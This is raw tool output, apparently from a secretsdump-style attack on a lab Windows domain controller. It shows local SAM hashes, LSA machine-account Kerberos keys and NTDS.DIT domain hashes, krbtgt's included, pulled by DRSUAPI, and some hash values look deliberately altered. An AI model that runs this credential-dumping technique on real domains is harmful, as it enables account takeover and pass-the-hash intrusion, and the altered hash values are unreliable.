Password:
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x5e58fc9bd5af13b97bf24756bada2d90
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b514asdasdaad3b435b51404ee:428bac438bb7e580008c4c4a7saacdab:::
Guest:501:aad3b435b51404eeaaasdasdb51404ee:31d6cfe0d16ae931b73c59d7e0dddac0:::
DefaultAccount:503:aad3b435asdasd4eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7easss9c0:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
EVolab\DC05$:aes256-cts-hmac-sha1-96:afc8b517c1949c5175c4asdasd33b93b814asde335a604a2b6a153
EVolab\DC05$:aes128-cts-hmac-sha1-96:a83ff583asd51asdf162
EVolab\DC05$:des-cbc-md5:d3a23716asd57cb9
........................................
........................................
........................................
........................................
........................................
........................................
........................................
........................................
........................................
........................................
........................................
........................................
........................................
........................................
........................................
........................................
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
........................................
........................................
........................................
........................................
........................................
........................................
........................................
EVolab\Administrator:500:aad3b435b51404eeaad3b435b51404ee:40dfc9bc32ca524f6928f275a2b7449d:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:99683667d9f3788c5b2288a4bb5f2656:::
evolab\lopper:61269:aad3b435b51404eeaad3b435b51404ee:59fc0f884922b4ce376051134c71e22c:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Doas:1001:aad3b435b51404eeaad3b435b51404ee:e124abcd3996d16a425ae94091d1db6e:::
EVolab\tod:1127:aad3b435b51404eeaad3b435b51404ee:9205952bf0d1c16194c1007912620776:::
EVolab\fod:1133:aad3b435b51404eeaad3b435b51404ee:b4e43c51809c7603d9dbffe6fdedd80f:::
EVolab\flip:1136:aad3b435b51404eeaad3b435b51404ee:179adcf86fbb060128fc1f77b7c82424:::
EVolab\loader:24980:aad3b435b51404eeaad3b435b51404ee:906ef9b5b9b7581def18a15ee13d3cc4:::
EVolab\adm-sat:44947:aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42:::
EVolab\Fa_SS:45727:aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42:::
EVolab\jobber:43743:aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42:::
EVolab\troll:1162:aad3b435b51404eeaad3b435b51404ee:59fc0f884922b4ce376051134c71e22c:::
EVolab\fister:1173:aad3b435b51404eeaad3b435b51404ee:59fc0f884922b4ce376051134c71e22c:::
EVolab\fuller:1177:aad3b435b51404eeaad3b435b51404ee:d6a33c9e6123459c9812123321f087d3:::
........................................
........................................
........................................
........................................
........................................
........................................
........................................
........................................
........................................
........................................
........................................
........................................
........................................
........................................
........................................
........................................
........................................
........................................
........................................
........................................
........................................
........................................
........................................
........................................
........................................
........................................
........................................
........................................
........................................
........................................
